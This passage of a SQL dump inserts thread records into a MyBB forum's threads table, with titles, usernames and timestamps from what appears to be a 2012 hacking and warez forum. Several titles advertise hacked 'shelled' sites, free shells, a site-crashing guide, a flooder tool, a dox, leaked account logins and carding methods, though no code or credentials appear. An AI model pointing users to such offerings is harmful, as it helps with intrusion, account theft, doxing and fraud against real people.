`firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1057', '9', 'oldest ptc site with more earning option', '0', '17', '0', '255', 'sbhshroy2', '1350902831', '6087', '1350902831', 'sbhshroy2', '255', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1058', '24', 'Microsoft or Apple', '0', '0', '0', '228', 'VirtualLegend', '1350903117', '6090', '1351138173', 'Romdu62', '7', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1059', '9', 'new ptc site with more earning option', '0', '17', '0', '255', 'sbhshroy2', '1350903502', '6092', '1351174019', 'sirchamp', '53', '24', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1060', '3', '[Bug] with the new plugin', '0', '0', '0', '62', 'R?????zo?', '1350910705', '6116', '1351122047', 'R?????zo?', '62', '55', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1061', '64', '[FREE] HUGE MOVIE LIST [DOWNLOAD]', '0', '0', '0', '62', 'R?????zo?', '1350911319', '6118', '1350911319', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1062', '64', 'New movie stream site I found!!', '0', '0', '0', '62', 'R?????zo?', '1350911603', '6120', '1350911603', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1063', '81', 'Free Private Shells [Updated]', '0', '0', '0', '62', 'R?????zo?', '1350911895', '6121', '1350939240', 'R?????zo?', '62', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1066', '48', 'We have a problem here.', '0', '0', '0', '61', 'NXK', '1350919962', '6128', '1350939105', 'NXK', '61', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1067', '24', 'AMD or intel', '0', '0', '0', '285', 'dccfoux', '1350943568', '6174', '1350993995', 'mothered', '205', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1068', '54', 'giganews (usenet)[vpn] acount for lifetime', '0', '15', '0', '255', 'sbhshroy2', '1350992146', '6184', '1350993126', 'R?????zo?', '62', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1069', '54', '[23 October] Premium Elite XXX Passes, All Checked And Working', '0', '15', '0', '255', 'sbhshroy2', '1350992268', '6185', '1350992957', 'R?????zo?', '62', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1070', '7', 'How many hours a day are you online?', '0', '0', '0', '205', 'mothered', '1350998892', '6194', '1351260555', 'sirchamp', '53', '39', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1071', '3', 'VirtualLegend - banned?', '0', '0', '0', '264', 'D?ea', '1351011779', '6199', '1351107900', 'iTzIpod', '82', '61', '10', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1073', '64', 'Free Premium Netflix logins', '0', '0', '0', '5', 'Timmy', '1351043037', '6241', '1351218532', 'iTzIpod', '82', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1074', '84', '[NEW] App Trailers Exploit [HOT!]', '0', '0', '0', '5', 'Timmy', '1351044408', '6244', '1351472106', 'Apathy', '2', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1075', '9', '? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '0', '0', '7', 'Romdu62', '1351045084', '6245', '1351105973', 'NXK', '61', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1076', '34', '157 Graffiti Fonts [the best of all]', '0', '0', '0', '7', 'Romdu62', '1351045281', '6246', '1351390622', 'Romdu62', '7', '36', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1077', '47', 'Free chocolates and drinks', '0', '0', '0', '7', 'Romdu62', '1351046027', '6247', '1351215596', 'Romdu62', '7', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1081', '43', 'Minecraft Accounts!! Over 20,000!', '0', '0', '0', '160', 'Jacob', '1351109254', '6284', '1351197885', 'iTzIpod', '82', '39', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1078', '7', 'Kasual/Rave\'s DOX (Thanks to NSA)', '0', '0', '0', '222', 'Exposé', '1351056377', '6254', '1352433223', 'Apathy', '2', '137', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1079', '7', 'ADD ME ON SKYPE', '0', '0', '0', '257', 'XxTREYZxX', '1351064642', '6258', '1351108475', 'VirtualLegend', '228', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1080', '13', '[FREASH] 4 ASP shelled sites!!!![hacked]', '0', '0', '0', '258', 'PiXEL^OG', '1351091701', '6270', '1351463824', 'p420', '9', '18', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1082', '74', 'WarZ', '0', '0', '0', '61', 'NXK', '1351111804', '6287', '1351118271', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1083', '4', 'Hey Guys', '0', '0', '0', '160', 'Jacob', '1351125122', '6300', '1351161221', 'R?????zo?', '62', '22', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1084', '4', 'hey guys', '0', '0', '0', '291', 'xXGANNONXx', '1351131193', '6311', '1351253318', 'NXK', '61', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1085', '71', '(help)optifine for minecraft', '0', '0', '0', '291', 'xXGANNONXx', '1351131536', '6313', '1351132483', 'XxTREYZxX', '257', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1086', '75', 'Skyrim Cheats and tips', '0', '0', '0', '291', 'xXGANNONXx', '1351132358', '6316', '1351662607', 'XxTREYZxX', '257', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1087', '74', 'GEARS OF WAR :P', '0', '0', '0', '257', 'XxTREYZxX', '1351133051', '6323', '1352000872', 'RAND0M1ZER', '262', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1089', '42', 'Homeless man saves officer from getting his ass whopped', '0', '0', '0', '5', 'Timmy', '1351137461', '6328', '1351215477', 'Romdu62', '7', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1090', '8', 'What is this song called?', '0', '0', '0', '5', 'Timmy', '1351137598', '6329', '1351309139', 'XxTREYZxX', '257', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1091', '56', 'Rate the avatar above you', '0', '0', '0', '257', 'XxTREYZxX', '1351143929', '6338', '1352551496', 'iTzIpod', '82', '167', '49', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1092', '82', 'Welcome New Members To The Marketers Palace', '0', '17', '0', '228', 'VirtualLegend', '1351151522', '6340', '1351151522', 'VirtualLegend', '228', '14', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1093', '7', 'I\'m back', '0', '0', '0', '257', 'XxTREYZxX', '1351152283', '6341', '1352770004', 'TheBlueCat97', '346', '51', '8', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1096', '7', 'Leaked e-book Pack [Lot\'s of stuff]', '0', '0', '0', '257', 'XxTREYZxX', '1351158423', '6357', '1351217686', 'XxTREYZxX', '257', '33', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1095', '8', 'Azz & Tittiez', '0', '0', '0', '228', 'VirtualLegend', '1351156575', '6354', '1351167973', 'mothered', '205', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1094', '58', 'The Marketers - Official Recruitment | Join us Today !', '0', '0', '0', '228', 'VirtualLegend', '1351155294', '6348', '1351549156', 'VirtualLegend', '228', '64', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1099', '16', 'Box Method and Drop Explained', '0', '0', '0', '7', 'Romdu62', '1351216534', '6401', '1351728048', 'NXK', '61', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1097', '9', 'Monetizing e-book', '0', '0', '0', '257', 'XxTREYZxX', '1351158574', '6358', '1351684387', 'VirtualLegend', '228', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1098', '9', 'CPA Headhunters - Learn How To Make Bank', '0', '0', '0', '228', 'VirtualLegend', '1351192844', '6375', '1351197440', 'R?????zo?', '62', '18', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1100', '42', '895 passwords not to use.', '0', '0', '0', '7', 'Romdu62', '1351217077', '6402', '1351390576', 'Romdu62', '7', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1101', '49', 'Dumps Section', '0', '0', '0', '8', 'spacefish36', '1351217673', '6409', '1351253187', 'NXK', '61', '15', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1102', '69', 'What kinds of programs have you coded before', '0', '0', '0', '8', 'spacefish36', '1351218025', '6412', '1351553941', 'RAND0M1ZER', '262', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1103', '3', 'Movie & TV RIPs, Streams etc', '0', '0', '0', '1', 't3h jok3r', '1351218130', '6413', '1351252899', 'mothered', '205', '10', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1104', '64', 'The raise of the apes (2011) movie rip available here', '0', '0', '0', '9', 'p420', '1351218445', '6418', '1351218445', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1105', '24', 'Windows 8 Officially released 26-10', '0', '0', '0', '205', 'mothered', '1351225585', '6427', '1351828953', 'mothered', '205', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1106', '49', 'Halloween Logo?', '0', '0', '0', '222', 'Exposé', '1351235974', '6430', '1351352571', 'iTzIpod', '82', '52', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1117', '82', 'Start Banking $297+ In 24hrs From Now....', '0', '0', '0', '228', 'VirtualLegend', '1351354461', '6499', '1351354461', 'VirtualLegend', '228', '9', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1107', '15', 'Free] = DecFlooder v1.00 = [Free]', '0', '0', '0', '257', 'XxTREYZxX', '1351249473', '6441', '1351249473', 'XxTREYZxX', '257', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1108', '12', 'How to Crash Small Websites', '0', '0', '0', '257', 'XxTREYZxX', '1351250715', '6442', '1351334986', 'VirtualLegend', '228', '15', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1110', '54', '[27 OKT]Brazzers,Bangbros,Realitykings,...and more WORKING PASSES FOR 27.OKT.2012', '0', '15', '0', '255', 'sbhshroy2', '1351280920', '6464', '1351280920', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1109', '47', 'free vpn', '0', '0', '0', '255', 'sbhshroy2', '1351271375', '6458', '1351275258', 'sirchamp', '53', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1111', '54', '[27 oct]huge collection of porn acounts,more than 50 porn sites acount*no download*', '0', '0', '0', '255', 'sbhshroy2', '1351287012', '6466', '1351287012', 'sbhshroy2', '255', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1112', '49', 'SUGGESTION', '0', '0', '0', '257', 'XxTREYZxX', '1351309406', '6472', '1351482601', 't3h jok3r', '1', '34', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1120', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '0', '0', '7', 'Romdu62', '1351390806', '6523', '1352249456', 't3h jok3r', '1', '51', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1113', '54', '[27 0ct]huge collection of premium porn acounts. all checked and working', '0', '17', '0', '255', 'sbhshroy2', '1351315333', '6476', '1351444965', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, 